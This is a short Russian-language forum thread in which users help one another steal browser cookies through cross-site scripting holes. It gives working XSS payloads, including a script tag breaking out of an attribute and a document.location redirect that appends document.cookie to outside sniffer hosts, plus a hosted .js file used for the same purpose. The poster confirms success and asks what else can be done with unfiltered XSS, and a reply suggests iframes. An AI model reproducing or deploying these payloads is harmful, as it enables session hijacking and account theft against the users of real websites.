Добрый день!
Подскажите пожалуста содержания скрипта
чтоб он напрвалял куки на снифер.
Например
в xxs уязвимости я писал бы <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

и получал бы куки на снифер..
тоесть надо содержание xss.js

спс

<script>document.location='http://ha.ckers.org/xss.js' +document.cookie</script>

Я сделал файл xss1.js с такаим содержание :
<script>document.location='http://hackedpro.org/tools/sniff/s.gif' +document.cookie</script>

И залил его сюда: http://xss999.jino-net.ru/xss1.js

теперь я в найденой xss уязвимости пишу : "'><SCRIPT SRC=http://xss999.jino-net.ru/xss1.js></SCRIPT>


но всёравно посемуто не получаю лог на снифер, где я ошибся?

пиши в найденной xss "'><script>document.location='http://ha.ckers.org/xss.js' +document.cookie</script>

кароч читай вот это http://bugtraq.ru/library/www/xssanatomy.html

Всё спс разобрался,но теперь ещё вопрос есть..
Что можно сделать(помимо воровства куки) с помощью Xss уязвимости, если ваще нет никакой фильтрацции, тоесть допустимы любые теги?

Ифрейм!)